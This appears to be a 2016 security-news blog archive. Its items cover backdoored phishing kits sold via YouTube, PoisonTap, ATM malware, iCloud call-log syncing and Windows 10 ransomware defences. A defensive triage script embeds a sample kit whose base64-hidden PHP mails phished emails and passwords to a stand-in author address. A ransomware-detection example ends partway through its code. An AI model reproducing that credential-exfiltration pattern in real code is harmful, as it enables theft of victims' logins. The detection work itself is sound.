Friday, 25 November 2016

Phishing Templates Advertised on YouTube

Scammers are abusing YouTube as a new way to promote backdoored phishing templates and provide potential buyers with information on how to use the nefarious software, Proofpoint researchers warn.

Because cybercrime is a business, crooks are constantly searching for new means to advertise their products to increase gains. For some, YouTube seemed like a good selling venue, and they decided to promote their kits on this legitimate website.

A search for “paypal scama” returns over 114,000 results, but buyers are in for a surprise, Proofpoint reveals. To be more precise, while the kits work as advertised, they also include a backdoor that automatically sends the phished information back to the author.

Proofpoint security researchers stumbled upon several YouTube videos that linked to phishing kits, templates, or to pages offering more information on these. The videos were created to show what the templates looked like and to instruct potential buyers on how to collect the phished information.

One of these videos, for example, showed an Amazon phishing template meant to replicate the legitimate login page on the web portal. The video’s authors instructed interested parties to contact them via a Facebook page.

When analyzing the code taken from another example of a phishing template that has been downloaded from a link on a similar video, the security researchers found the author’s Gmail address hardcoded in it. Thus, the author would receive the results of the phish each time the kit was used.

The same kit included a secondary email address that was also receiving the stolen information. What the security researchers didn’t manage to figure out was whether the same author included both addresses in the code or someone else added the second one and decided to redistribute the kit.

A PayPal scam analyzed by the researchers revealed that the cybercriminals attempted to avoid suspicion by adding a PHP include for a file called style.js just before the PHP “mail” command is used to send the stolen credentials. The style.js file, however, was found to include more encoded PHP code. The hidden command in the code was also meant to send the phished information to the author.
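A defender-side triage script for the backdoor patterns described above, added here as an example (it is not Proofpoint's tooling). It scans a constructed sample kit for three things: recipient addresses visible next to mail(), an include of a non-.php file such as style.js, and base64-encoded PHP inside that file whose decoded body carries a second, hidden address. All file names and addresses are constructed.

```python
"""Static triage of a phishing kit's source for hidden exfiltration recipients.

Patterns checked (all from the Proofpoint write-up): hard-coded e-mail addresses
near mail(), includes of files whose extension hides PHP (style.js), and
base64-encoded PHP whose decoded body sends a copy of the phished data.
"""
import base64
import re

EMAIL_RE = re.compile(r"[\w.+-]+@[\w-]+\.[\w.-]+")
MAIL_CALL_RE = re.compile(r"\bmail\s*\(")
INCLUDE_RE = re.compile(r"\b(include|require)(_once)?\s*\(?\s*['\"]([^'\"]+)['\"]")
ENCODED_RE = re.compile(r"base64_decode\s*\(\s*['\"]([A-Za-z0-9+/=]+)['\"]\s*\)")

# Constructed sample kit (not a real kit): the buyer's address is in plain sight,
# the author's address only appears once the blob hidden in "style.js" is decoded.
_HIDDEN_PHP = (b'mail("kit-author@example.net", "copy", '
               b'$_POST["email"] . ":" . $_POST["password"]);')
SAMPLE_KIT = {
    "login.php": '<?php\n$to = "kit-buyer@example.com";\ninclude("style.js");\n'
                 'mail($to, "PayPal login", $_POST["email"] . ":" . $_POST["password"]);\n?>',
    "style.js": "<?php eval(base64_decode('"
                + base64.b64encode(_HIDDEN_PHP).decode() + "')); ?>",
}


def find_recipients(src):
    """Return the e-mail addresses visible in the source text."""
    return set(EMAIL_RE.findall(src))


def find_suspicious_includes(src):
    """Includes of files not ending in .php (e.g. style.js) are a classic hiding spot."""
    return [m.group(3) for m in INCLUDE_RE.finditer(src)
            if not m.group(3).lower().endswith(".php")]


def decode_hidden_php(src):
    """Decode base64 literals handed to base64_decode and keep those that are PHP."""
    found = []
    for m in ENCODED_RE.finditer(src):
        try:
            text = base64.b64decode(m.group(1)).decode("utf-8", "replace")
        except (ValueError, TypeError):
            continue
        if "<?php" in text or MAIL_CALL_RE.search(text):
            found.append(text)
    return found


def triage_kit(files):
    """files: dict of path -> source text. Returns per-file findings."""
    report = {}
    for path, src in files.items():
        hidden = decode_hidden_php(src)
        hidden_rcpt = set()
        for blob in hidden:
            hidden_rcpt |= find_recipients(blob)
        report[path] = {
            "recipients": sorted(find_recipients(src)),
            "includes": find_suspicious_includes(src),
            "hidden_php": hidden,
            "hidden_recipients": sorted(hidden_rcpt),
        }
    return report


def backdoor_addresses(report):
    """Addresses that only exist inside decoded blobs: the kit author's silent copy."""
    visible, hidden = set(), set()
    for findings in report.values():
        visible |= set(findings["recipients"])
        hidden |= set(findings["hidden_recipients"])
    return sorted(hidden - visible)


if __name__ == "__main__":
    rep = triage_kit(SAMPLE_KIT)
    for path, findings in rep.items():
        print(path, findings["recipients"], findings["includes"], findings["hidden_recipients"])
    print("backdoor recipients:", backdoor_addresses(rep))
```

Run against a real kit by replacing SAMPLE_KIT with the files read from disk; the visible recipient is the buyer, and anything reported by backdoor_addresses is the address that profits from every deployment.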

“Many of the video samples we found on YouTube have been posted for months, suggesting that YouTube does not have an automated mechanism for detection and removal of these types of videos and links. They remain a free, easy-to-use method for the authors of phishing kits and templates to advertise, demonstrate, and distribute their software,” Proofpoint says.

The security researchers say that they found multiple samples where the authors included backdoors that allow them to harvest the phished credentials even after other actors purchased the templates to use them in their own campaigns. The victims of phishing attacks suffer the most, because they have their credentials stolen by multiple actors each time the backdoored kits are used.

Tuesday, 22 November 2016

Facebook built censorship tool to get into China despite human rights risks

Facebook wants to be unbanned in China, so it’s built a censorship tool that could hide posts about prohibited topics from people in China, according to The New York Times’ Mike Isaac. Rather than censor posts itself, Facebook would potentially provide the tool to a third party in China, such as a local partner company, that could use it to prevent users in China from seeing content that breaks the government’s rules.
While China could unlock huge amounts of users and ad revenue for Facebook, the censorship tool could also be used to enact human rights abuse. If China could track which local users are trying to protest or bad-mouth the government, they could face persecution.
Perhaps that’s why The New York Times says several Facebook staffers who worked on the product have left the company. So far, there are no signs that Facebook has offered the tool to Chinese authorities. We don’t have details on the specifics of how it would work. It’s apparently only one of several ideas Facebook has explored for getting access to China, and they might never be launched.
But the existence of the tool brings up strong concerns about what’s best and safest for Chinese citizens.
Mark Zuckerberg has held in the past that some Facebook access could benefit them. The New York Times reports that at an internal Q&A about its intentions in China, Zuckerberg said, “It’s better for Facebook to be a part of enabling conversation, even if it’s not yet the full conversation.”
That mirrors Facebook’s stance about internet access, where it’s pushed the idea that limited free access to the web is better than none at all for those who can’t afford it. Facebook already allows Chinese companies to buy ads that run in places where it isn’t banned.
In a statement to TechCrunch, a Facebook spokesperson wrote: “We have long said that we are interested in China, and are spending time understanding and learning more about the country. However, we have not made any decision on our approach to China. Our focus right now is on helping Chinese businesses and developers expand to new markets outside China by using our ad platform.”
Over time, the interpersonal connection via Facebook could strengthen communities who might be able to organize and protest the government outside of the app. Yet the censorship tool’s potential to be used to round up dissidents looms over any long-term benefit for citizens, or profit for Facebook.

Trump Mentions Cyber in 100-Day Plan

In a Monday evening video message, Donald Trump discussed how he intends to address trade, energy, regulation, national security, immigration and ethics-related issues during the first 100 days of his presidency—and he also addressed cybersecurity, very briefly.
Characterizing his agenda as “putting America first,” the president-elect said that cyber-attacks from foreign governments and non-state terrorist actors are “one of our most critical national security concerns.”
Details were few, but the Republican pledged to create a Cyber Review Team to provide safeguarding recommendations and establish protocols and awareness training for government employees. He also said that he would direct the Department of Defense and the chairman of the Joint Chiefs of Staff to develop a comprehensive plan to protect the United States' infrastructure from cyber-attacks, as well as all other forms of attacks, during his first 100 days in office.
Rick Hanson, the executive vice president at Skyport Systems, said via email that “It’s not enough for a president to ask the DoD and JCS to develop a comprehensive cyber-plan, that has nothing new. We as a country need a clear focus from the top of the food chain down. A cabinet position that focuses on cyber as well as a strong focus and knowledge of the implications by the president himself. We can no longer rely on other agencies to build a plan."
Lastly, Hanson added, "A plan must be built and executed by those who have an intimate knowledge of cyber-infrastructure and the threat landscape that not only exists but is possible. The sooner we secure our infrastructure from the core, the more efficient we will be in maintaining the security of our cyber-infrastructure. Regulations and guidelines must exist that define what our core infrastructure looks like from the bare metal. Security at the hardware level is essential for a truly secure infrastructure."

Monday, 21 November 2016

Twitter Celebs and Corporate Accounts Hacked Through Third Party

A third party Twitter site was hacked over the weekend and various celebrity and media accounts taken over to promote an “increase Twitter followers” service.
Twitter Counter, which claims to be the ‘#1 stat site powered by Twitter’, posted the following on Saturday:
“We can confirm that our service has been hacked; allowing posts on behalf of our users! We have launched an investigation into this matter.”
Earlier, countless celebrity accounts including those of Charlie Sheen and Lionel Messi, as well as the likes of Sky News, The New Yorker, The Next Web, and The Economist posted tweets on behalf of a site claiming to increase users’ Twitter followers.
Even the Twitter accounts of the US National Transportation Safety Board (NTSB), Playstation and Xbox were compromised.
Twitter Counter subsequently confirmed that it had addressed the problem and hackers can’t post on its users’ behalf any more.
It’s unclear exactly how the cyber attack on the firm occurred, but it has been quick to reassure customers with the following update:
“We ensure the privacy of our users' information. We do not store credit card information and we do not keep Twitter account passwords.”
Although the hackers appear to have focused their efforts on taking over high profile accounts with many followers, regular users would probably still do well to change their passwords and switch on two-factor authentication.
The incident is also a reminder of the potential security risk of linking one’s social accounts to third party services like Twitter Counter, as they can provide another way for hackers to attack.
In September, Twitter joined a new industry coalition designed to improve cybersecurity standards.
The Vendor Security Alliance (VSA) will help businesses assess how secure the companies they’re looking to partner with are to ensure there are no weak links in the chain.

FBI: US ATMs Could Be Hacked to Spew Cash

The FBI is warning that potential ATM attacks, similar to those in Taiwan and Thailand that caused ATMs to dispense millions, could happen in the US.
The FBI said in a recent bulletin that it was “monitoring emerging reports indicating that well-resourced and organized malicious cyber-actors have intentions to target the US financial sector.” Now, the Wall Street Journal has reported that the threat could be linked to malicious software used by the Russian gang known as Buhtrap, known for stealing money through fraudulent wire transfers. Sources said that the group has been testing ATM hacking techniques on Russian banks, and will soon look to try them out on financial institutions in other countries.
The first such attack on an ATM system was reported in the Taiwanese capital Taipei in July, after 22 thieves made off with $2.6 million from ATMs around the country by causing them to spit out cash. Criminals from eastern Europe and Russia are said by police to have used malware to infiltrate cash machines run by First Commercial Bank. Three suspects were eventually arrested in Taipei and north-east Taiwan, with around half the money recovered.
A similar attack was reported at the Government Savings Bank in Thailand the following month. There, the Ripper malware was used in a sophisticated campaign to steal 12 million baht (£265,400) from ATMs in Thailand. Ripper targets three major global ATM manufacturers, and is unusual in that it interacts with the targeted machine via a specially crafted bank card featuring an EMV chip which acts as an authentication method.

Sunday, 20 November 2016

China adopts tough law on cyber-security

China today adopted a tough cybersecurity law which it said was aimed at safeguarding sovereignty on cyber space and national security, and to deal with related risks at home and abroad.
The new law was passed by China's legislature, the National 
According to the new law, the government will take measures to "monitor, defend and handle cybersecurity risks and threats originating from within the country or overseas sources, protecting key information infrastructure from attack, intrusion, disturbance and damage".
Efforts will also be made to punish criminal activities online and safeguard the order and security of cyberspace, state-run Xinhua news agency reported.
Under the new law, individual users and organisations are not allowed to jeopardise security on the Internet or use it to "damage national security, honour and interests".
Online activities that are attempts to overthrow the socialist system, split the nation, undermine national unity, advocate terrorism and extremism are all prohibited, according to the provisions, which also forbade activities including inciting ethnic hatred, discrimination and spreading violence and obscene information online.
The law was passed at the bimonthly session of the NPC Standing Committee, which concluded today, after a third reading.
China administers its internet with massive firewalls to protect against outside intervention.
It also effectively banned social media outlets like Facebook and Twitter, and controls the local social media sites like Weibo through the firewalls blocking any content that harms the ruling Communist Party of China and the government.

Now Facebook users can automatically launch "Safety Check"

Facebook will now allow its 1.2 billion users to automatically launch its crisis response tool, "Safety Check".

According to a report by on Thursday, this change will allow the community to decide the urgency of the nearby danger, something Facebook has struggled to grasp.

In areas of immediate danger, Safety Check allows people to notify their family and friends that they are safe. This Facebook feature has been used during natural calamities and terrorist attacks across the world.

"When Facebook had control of Safety Check, it had a high standard of what counted as a disaster. A typhoon in the Philippines might have six inches of water in your house, and in California, that'd be a big deal. But in the Philippines, we did research there, and people said this wasn't a big deal," the report quoted Peter Cottle, Facebook's lead engineer on crisis response, as saying.

"In the past two years, Facebook turned on Safety Check 39 times. Compare that to 335 dangerous events flagged by its community-based Safety Check tool since the company began testing it in June. One of the first instances of a community-generated Safety Check was the Orlando nightclub shooting in June," the report said. 

Facebook considers an event as not being an emergency if the users ignore the Safety Check, which then fades itself. 

"We can tell how many people are spreading this and marking themselves safe, and how quickly it's growing. There's a real strong measure of urgency based on the rapidness of the people who are using the tool," Cottle said.

However, Facebook has been criticised for being selective when it comes to launching Safety Check tool during a crisis. 

In November 2015, Facebook CEO Mark Zuckerberg responded with a Facebook post saying, "We care about all people equally, and we will work hard to help people suffering in as many of these situations as we can."

Reports said that Facebook was also testing out a Community Help page that "users can access after checking in as safe. There, users can post if they need shelter, food or supplies, or if they can provide any of those resources". 

The Community Help feature is expected to be available by January 2017.

Saturday, 19 November 2016

If You Use an iPhone, Call Logs Are Quietly Synced to iCloud, Forensics Firm Warns

A log of all phone calls made from iPhone devices running iOS 8 or newer may be automatically synchronized to iCloud and susceptible to third-party access, digital forensics and IT security solutions provider Elcomsoft has warned.

The issue, Elcomsoft’s Oleg Afonin explains, is not only that call records are synced to iCloud (when iCloud is enabled) regardless of whether the user wants that to happen or not, but also that iCloud data is loosely protected. Thus, if a user’s calls are synced to the cloud, Apple itself and third parties with access to the proper credentials could extract them.
What’s more, all of the information stored in iCloud is available for law enforcement upon request, unlike data stored exclusively on the device, which Apple has said numerous times it cannot access.
In fact, Apple entered a spat with the FBI earlier this year when it refused to help decrypt the iPhone of San Bernardino shooter Syed Rizwan Farook, claiming that the Bureau was actually requesting a backdoor to be included in all iPhone devices. Eventually, the FBI received help from a third-party firm, but the quarrel went viral as large tech companies expressed their support for Apple. Some even announced plans to improve their encryption to provide users with increased privacy.

“On devices running iOS 8 and later versions, your personal data is placed under the protection of your passcode. For all devices running iOS 8 and later versions, Apple will not perform iOS data extractions in response to government search warrants because the files to be extracted are protected by an encryption key that is tied to the user’s passcode, which Apple does not possess,” Apple says.
However, the same is not true about data saved on iCloud, because the same encryption level no longer applies to it. In Afonin’s opinion, the cloud syncing functionality is actually a blessing for forensic researchers and law enforcement agencies, as they can access user information that would otherwise be out of reach, because of the privacy features in iOS.  
“The ability to extract call logs from the cloud instead of having to deal with the tough hardware protection of today’s iPhones can be a blessing for forensic examiners,” Afonin says.

For users, however, this is a privacy nightmare. Not only is access to their data much easier, for Apple and for anyone with the right credentials, but the synced data – in this instance, call logs – is visible on all devices on which the same Apple ID is used.
If a user has two iPhones but a single Apple ID, the calls will appear on both devices. If two people share the same Apple ID, they will have visibility into each other’s calls. What’s more, if one of them clears the calls list on their device, the other user/device will be impacted as well.
The only way to avoid that, Elcomsoft says, is to disable iCloud Drive functionality on the iPhone. The move will not affect features such as iCloud Photo Library or iCloud backups, but will affect the syncing of data for third-party apps that rely on iCloud Drive for that. Increased privacy, it seems, comes at a cost.

Thursday, 17 November 2016

Google and Facebook ban fake news sites from their advertising networks

While it would have been nice to tackle this issue before the election, Google and Facebook are finally taking a tiny step in order to fight back against fake news. According to multiple statements, both companies have updated their policies to ban fake news sites from using Facebook’s and Google’s advertising networks.
With the U.S. election, fake news became incredibly popular on social networks, such as Facebook, Twitter and YouTube, as well as news aggregating services, such as Google News and news articles in Google search results. We’re not talking about opinion articles — we’re talking about reports spreading blatantly inaccurate information.
Google first updated its policy saying that the company will try to ban sites that “misrepresent, misstate, or conceal information.” Websites that don’t comply with this rule will get banned from using Google AdSense.
When it comes to Facebook, the company has also updated its policy to rule out fake news sites from using Facebook Audience Network.
Google AdSense and Facebook Audience Network let content publishers display ads on their websites. Google and Facebook manage the ad inventories, content publishers get a cut for clicks or impressions.
Both companies already have strict policies for their ad networks. For instance, you can’t use Google AdSense on a porn website. Google uses a combination of algorithms and human moderation to decide whether a site is eligible to use its advertising service.
By removing a potential revenue stream, it makes the business of fake news a bit less lucrative. For instance, Buzzfeed discovered that more than 100 fake news sites were created in a tiny city in Macedonia. So it’s clear that it’s not just about influencing the election — people are taking advantage of social networks to make money using fake news.
But there will always be alternative revenue streams, so this move is not enough. Reducing the reach of these websites is the best way to prevent fake news sites from popping up. If Facebook, Twitter, Google News and other websites flagged fake news appropriately, then there would be no reason to create fake news sites in the first place.

FIFA Hackers Steal $16 Million from EA

A hacker has been convicted of embezzling $16 million from gaming bigwig Electronic Arts, using “FIFA coins,” an in-game virtual currency for a soccer-themed video game.
Anthony Clark, 24, of Whittier, Calif., was convicted of wire fraud by a jury sitting in Fort Worth, Texas. Clark and three co-conspirators gamed the game, as it were. You see, in the FIFA Football game, players can earn FIFA coins based on the time they spend playing. People like soccer, and due to the popularity of FIFA Football, a secondary market has developed whereby FIFA coins can be exchanged for US currency. 
Clark and his buddies managed the ultimate hat trick: They circumvented multiple security mechanisms created by EA in order to fraudulently obtain FIFA coins worth over $16 million. Specifically, the group created software that fraudulently logged thousands of FIFA Football matches within a matter of seconds, and as a result, EA computers credited them with improperly earned FIFA coins. They then exchanged their FIFA coins on the secondary market for over $16 million.
Co-conspirators Nick Castellucci, 24, of N.J.; Ricky Miller, 24, of Arlington, Texas; and Eaton Zveare, 24, of Lancaster, Va., previously pleaded guilty and they await sentencing. 
Interestingly, the issue with FIFA coins is not new. In 2014, a member of an international hacking ring responsible for stealing between $100 and $200 million in intellectual property and other proprietary data from Microsoft’s Xbox gaming platform developed a software exploit that did something similar to what Clark and crew accomplished. The exploit generated millions in in-game, virtual currency for Electronic Arts’ FIFA line of soccer games, which he then sold in bulk quantities on the black market.
That same ring was also accused of stealing a pre-release version of Epic’s video game, Gears of War 3; and a pre-release version of Activision’s uber-popular video game, Call of Duty: Modern Warfare 3. Gaming is a high-profile target given the billions that the industry rakes in every year.

Cybersecurity – Just Like Sex, Drugs & Rock ‘n’ Roll

There is no technical solution to a behavioral problem.
In light of relentless data breaches is endpoint protection software still fit for purpose? People naturally behave in insecure ways, and addressing this through education and awareness is a key challenge for the cybersecurity industry. Focusing solely on technological measures to defeat cyber-criminals will always be a losing battle, so instead of trying to resolve the symptoms we must address the root cause. 
Early social engineering tactics, such as the “Nigerian Prince needs your help” 419 scam, involved little technology. The cyber-criminals would send vast numbers of spam emails and simply wait for a victim to respond. The remainder of the scam would be executed via emails, phone calls or in person; it relied on the greed or gullibility of the victim to ensure they continued co-operating with the criminals.
Over time the cyber-criminal’s tactics have evolved and become more sophisticated, using complex social engineering techniques and malware. Nevertheless, the root cause remains the same. The victim must actively participate in the initiation of the scam, by opening an attachment, clicking on a link, or responding to an email. Our collective obedience in the face of perceived authority, desire to help others, willingness to get our jobs done in a high intensity business environment and natural curiosity simply work against us.
However, we shouldn’t throw our hands in the air, accept the inevitable and just give up. There are simple but effective approaches to reducing the risk, and it starts with education. Within the anti-phishing and secure email platform space, vendors are now offering training and awareness technologies with their security solutions. Instead of simply blocking attacks and quarantining emails, they give the user the opportunity to open the email, click on the malicious link to provide their real username and password to a fake website, or perform an otherwise insecure action – after the threat has already been quietly neutered. These platforms then direct the user to an educational system that explains why the email was malicious and what the user should have done instead.
These very effective systems are mainly confined to email and web security services. Extending these systems to endpoint security platforms is considerably more complex and somewhat impractical, especially in the context of unknown threats.
Modern anti-virus packages are extremely efficient. Based on AVTest results, the market leaders boast a 99.9% or higher detection rate for common malware. So, assuming the user doesn’t simply ignore the warnings and allows malware to launch, a decent up-to-date anti-virus package will protect against the vast majority of threats. That just leaves the difficult 0.1% to deal with – the zero-day threat.
Zero-day malware is unknown to traditional anti-virus products that use ‘known bad’ signatures to detect and identify malicious code. If these zero-day threats are unknown and undetectable, how can they be defeated? In theoretical terms there is an easy solution: whitelisting. Instead of taking the normal anti-malware approach of allowing all software to run and trying to detect which may be malicious, whitelisting defines a specific set of ‘known good’ applications. This whitelisted software is allowed to run unimpeded, and everything else is blocked.
This is a strong way to prevent malicious software from executing, but for many it’s impractical, expensive, time consuming and inflexible. The level of effort combined with the impact it has on organizations’ ways of working is something many aren’t willing or able to undertake.
So what is the solution?
Bluntly, there isn’t one panacea. Applications, operating systems and hardware will continue to become more complex, the Internet of Things will continue to expand and provide new routes for attackers to exploit, and with greater complexity comes greater opportunity for vulnerability. People will always slip and behave in insecure ways, regardless of vigilance. We can produce the usual list of ‘best practices’:
•    back up your data
•    don’t re-use passwords
•    ensure your anti-virus, email software, web browser and other security technologies are up to date
But these are messages people have heard many times before, and they mostly address the symptoms, not the root cause.
The key is to reduce that root cause risk as much as possible, and this brings us back to behavior. Technology and the internet is a fact of life and the majority of people are well aware that ‘cybercrime exists’: it’s a mainstream media story with incidents reported on a near-daily basis. However, it’s a minority of people who can reliably spot a carefully crafted phishing email, or a spoof website designed to steal usernames and passwords, and that’s one of the big reasons why cyber-criminals continue to succeed in their malicious endeavors.
This is why education and awareness is key. People must accept that although they are not expected to be technology experts, they have a personal responsibility to educate themselves on spotting issues and safely using the technology they work with every day – just as they may not be mechanics, but they still know how to own and operate a vehicle safely. Experience has shown that companies with the greatest success against cybersecurity threats usually run security awareness programs for their staff, which inevitably go hand in hand with a carefully thought out cybersecurity strategy.
As stated within Objective 4 of the UK Government’s cybersecurity strategy:
“Raise awareness amongst the public and businesses of the threat and the actions they can take to protect themselves.” Just like sex, drugs & rock ‘n’ roll – we have to adapt our own behavior to get all of the benefits and minimize the chance of short, medium or long-term damage.

Wednesday, 16 November 2016

$5 PoisonTap Device Cracks Open Locked Computers

A $5 tool called PoisonTap can allow malicious actors to easily hack into a locked computer.
Discovered by well-known independent white-hat hacker and developer, Samy Kamkar, PoisonTap siphons cookies, exposes internal routers and installs web backdoors on locked computers.
A physical device, PoisonTap simply needs to be plugged into a locked or password-protected computer to work its black magic. It emulates an Ethernet device over USB, and hijacks all internet traffic from the machine (despite being a low priority/unknown network interface).
In all, it allows the attacker to remotely force the user to make HTTP requests and proxy back responses (GET & POSTs) with the user’s cookies on any backdoored domain. It exposes the internal router to the attacker, making it accessible remotely via outbound WebSocket and DNS rebinding, and installs a persistent web-based backdoor in HTTP cache for hundreds of thousands of domains and common JavaScript CDN URLs, all with access to the user’s cookies via cache poisoning. On the cookie front, it stores HTTP cookies and sessions from the web browser for the Alexa top million websites.
“PoisonTap is built for the $5 Raspberry Pi Zero without any additional components other than a micro-USB cable and microSD card, but can work on other devices that can emulate USB gadgets such as USB Armory and LAN Turtle,” Kamkar explained in an analysis. “PoisonTap produces a cascading effect by exploiting the existing trust in various mechanisms of a machine and network, including USB, DHCP, DNS, and HTTP, to produce a snowball effect of information exfiltration, network access and installation of semi-permanent backdoors.
A video demonstration of just how easy it is to use can be found here.
While the initial compromise of the device requires physical access, subsequent access to the machine can be pulled off remotely. The backdoors and remote access persist even after the device is removed and the attacker “sashays away,” Kamkar noted.
The discovery represents a new threat vector. “There have been attacks that look similar to the PoisonTap; however, this one is exploiting a completely different system weakness,” said Craig Smith, research director of transportation security at Rapid7, via email. “A key difference with PoisonTap is that it emulates a network device and attacks all outbound communications from the target system. This attack works on both Windows and Mac operating systems, and can hijack a large number of connections, even if the machine is locked. If a user gets up to use the restroom—or even if it's a kiosk that has disabled the keyboard, but the interface is a web backend—this device will still work.”
He added, “The brilliance of the attack is actually in its simplicity: the most complex code in PoisonTap is the beautiful HTML5 canvas animation by Ara. On a $5 Raspberry Pi, Samy pulled together several clever attacks that add up to something really masterful.”

Tuesday, 15 November 2016

Mobile Workers Still Using Insecure Free Wi-Fi

Two-thirds of mobile workers are worried about the security implications of using free Wi-Fi hotspots, yet nearly half (42%) still access corporate networks via them, according to iPass.
The mobile connectivity firm polled over 1,700 business travelers to better gauge their technology habits, preferences and expectations on the road.
It revealed several mobile security trends which should concern CISOs.
Aside from the use of insecure free Wi-Fi, half said they’re allowed to use a personal device to access the corporate network, while over a third (38%) claimed they’d never used a VPN to protect data and comms.
Around three-quarters (72%) said they use free Wi-Fi at airports if it is available, exposing them to the risk of data theft and corporate espionage.
Patricia Hume, chief commercial officer at iPass, told Infosecurity the survey shows that corporate and employee data security priorities are worlds apart.
She added that banning access to free Wi-Fi on the road isn’t the answer.
“It is important that mobile workers are educated about how to find secure connectivity while on the move rather than using insecure Wi-Fi hotspots, as this can help to keep both mobile workers and enterprise security safe,” argued Hume.
“Businesses need to ensure they are making the effort to develop and implement a robust safe mobile usage policy and educating mobile workers on the importance of security while on the go.”
Although many IT departments mandate the use of corporate VPNs, low technical expertise may mean employees look for alternative ways to get online.
“Businesses need to take a clear step forward and ensure that corporate VPNs are used by employees when secure connectivity isn’t guaranteed,” concluded Hume.


A lobbying organization that includes some of the Internet’s most valuable entities made a plea to President-Elect Donald Trump to support the expansion of strong encryption and reform government surveillance activities. The Internet Association on Monday sent a letter to Trump’s transition team that included a number of policy suggestions beyond the realms of security and privacy in the name of online innovation and economic growth.

The letter supports an open Internet and asks Trump to prioritize security and privacy among other ideals in order to preserve online commerce. “From standardizing data security and breach notification, to protecting encryption standards across digital technologies, leaders in public office must recognize the importance of the internet as a place where people can share their information and ideas and start and grow their businesses from anywhere in the United States,” said Michael Beckerman, president and CEO of the Internet Association, which counts Amazon, Facebook, Google, Netflix, PayPal, Twitter and Uber among its members.

The privacy and data security section of the letter is predicated on preserving the secure collection of business-related data and how analytics drives economic growth. The organization points out that companies reliant on data analytics are more productive and profitable, and that Americans benefit via lower prices and improved services. 

The letter highlights regulatory proposals that threaten the value of data and urges Trump to champion what it calls “data innovation.” This includes “taking a harms-based approach to consumer privacy, instead of a collection-based approach, and stopping data minimization efforts or other proposals that would inhibit innovation,” the letter states. “In addition, federal enforcement agencies should focus on data security, partner with consumer groups to drive security best practices, and commit more resources to fight identity theft. Finally, policies should enable teachers to use online tech to boost educational outcomes for students.”

Trump’s rambling stance on cybersecurity during the debates did little to inspire confidence in his understanding of the issues. “The security aspect of cyber is very, very tough,” Trump said during the third debate. “And maybe it’s hardly doable. But I will say we are not doing the job we should be doing. But that’s true throughout our whole governmental society. We have so many things that we have to do better, and certainly cyber is one of them.”

Trump’s cybersecurity website explains his vision, which starts with a review of cyber defenses and vulnerabilities by a Cyber Review Team made up of public and private sector experts. Trump’s site also says the Justice Department will create task forces to coordinate local and government responses to threats. On the offensive side, Trump is looking for enhancements to U.S. Cyber Command from the Secretary of Defense and the Joint Chiefs that will allow the U.S. to respond to state and non-state actors if necessary. Experts are also concerned about Trump’s views on the FBI’s ongoing struggle with strong encryption and what it calls Going Dark. The Internet Association urged him to support strong encryption as a plus to national security and individuals’ rights. 

“Laws that require companies to engineer vulnerabilities into products and services harm personal privacy and endanger national security,” the letter states. “Support for strong encryption makes America more secure.” The letter also asks Trump to consider reforms to Section 702 of FISA, the authority under which the government compels service providers and technology companies to hand over data on foreign targets with the approval of the secret FISA court, and to Executive Order 12333, which governs intelligence collection conducted overseas outside that court process. The Internet Association also asked Trump to consider reforms to the outdated Electronic Communications Privacy Act governing stored communication. “Internet users must have the same protections for their inbox as they do for their mailbox. Updating ECPA to include a warrant for content stored across technologies, regardless of where it is stored or for how long, is overdue,” the letter states. “ECPA must be updated to reflect the significant role that internet commerce plays in global commerce.”

Monday, 14 November 2016

Microsoft Details Anti-Ransomware Protection in Windows 10

Microsoft’s latest desktop operating system release, which started rolling out to users in early August in the form of Windows 10 Anniversary Update, is packing improved ransomware resilience, the Redmond-based tech giant says.

Numerous new ransomware variants have emerged over the past 12 months alone, with popular threats including Locky, CryptXXX, and Cerber, which target Windows, and Microsoft appears determined to tackle them at the OS level. Other platforms aren’t safe from ransomware either, as variants such as Linux.Encoder, KeRanger, and Lockdroid have shown.
Microsoft decided to make Windows more ransomware-resilient because the number of such threats spotted in the wild in the past 12 months has more than doubled, Rob Lefferts, Director of Program Management, Windows Enterprise and Security, Microsoft, says. The company integrated the Windows 10 Anniversary Update with the necessary technology to protect against these threats, and now it has decided to detail them in a newly published whitepaper (PDF).

Some of the enhanced security features in the latest platform update include email protection that blocks malware sent through suspicious URLs or attachments, along with anti-exploit protection in Microsoft Edge, meant to block malicious code from silently downloading and executing an additional payload on the victim’s system.

On top of that, there’s the Windows Defender Advanced Threat Protection (ATP) that Microsoft revealed in March. Additionally, Microsoft packed both Office 2016 and Office 2013 with macro-blocking features, which should prevent document-borne ransomware and other types of malware from being executed on vulnerable computers.
As Lefferts explains, the purpose of different ransomware variants is the same: to infect the device and then deny access to files on it or to the entire device. What differs is the method that attackers use to perpetrate their attacks.

To ensure that ransomware is successfully blocked, Microsoft packed Windows 10 not only with the above mentioned security features, but also with new technology in Windows Defender, so that detection happens in seconds, before infection occurs, Lefferts says. Other Windows 10 security capabilities include Credential Guard, Windows Hello and others, all meant to make Windows 10 Anniversary Update the most secure Windows version yet.

Windows 10 devices are 58% less likely to encounter ransomware compared to those running Windows 7, Microsoft explains. The tech giant also explains that its strategy to stop ransomware involves prevention, detection, and response. Thus, the company didn’t focus only on stopping ransomware before it reaches the device, but also on blocking it from running on compromised machines and on providing the necessary intelligence to IT and Security professionals.

Related to prevention, Lefferts mentions browser hardening, where Adobe Flash Player, the most commonly exploited browser plug-in, runs in an isolated container in Microsoft Edge. There’s also email protection, where attachment types most popular among cybercriminals are blocked, and machine learning, where cloud infrastructure is leveraged to identify and block malware more quickly.

Better detection is available through a new and improved Windows Defender, which is enabled by default in Windows 10. “We’ve also improved Windows Defender’s behavioral heuristics to help determine if a file is performing ransomware-related activities, and then detect and take action more quickly,” Lefferts says.
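To make “behavioral heuristics” concrete, here is an added Python example of the simplest such rule: a process that changes the extension of many distinct files within a few seconds is almost certainly encrypting them. This is illustrative code written for this page, not Microsoft's Windows Defender logic, which is not published here. The file-system events are constructed; in practice they would come from Sysmon, ETW or an EDR agent. The window and file-count thresholds are assumptions chosen for the example.

```python
from collections import defaultdict

DOCS = r"C:\Users\alice\Documents"  # constructed path


def _ev(ts, pid, proc, op, src, dst=None):
    return {"ts": ts, "pid": pid, "proc": proc, "op": op, "src": src, "dst": dst}


# Constructed events (not real telemetry).
EVENTS = (
    # pid 4242 renames 40 documents to *.locked in under four seconds
    [_ev(100.0 + i * 0.1, 4242, "svchost.exe", "rename",
         f"{DOCS}\\report{i}.docx", f"{DOCS}\\report{i}.docx.locked") for i in range(40)]
    # pid 1000 is a word processor saving a file and swapping in its temp copy
    + [_ev(100.5, 1000, "winword.exe", "write", f"{DOCS}\\draft.docx"),
       _ev(101.0, 1000, "winword.exe", "rename", f"{DOCS}\\~WRD0001.tmp", f"{DOCS}\\draft.docx")]
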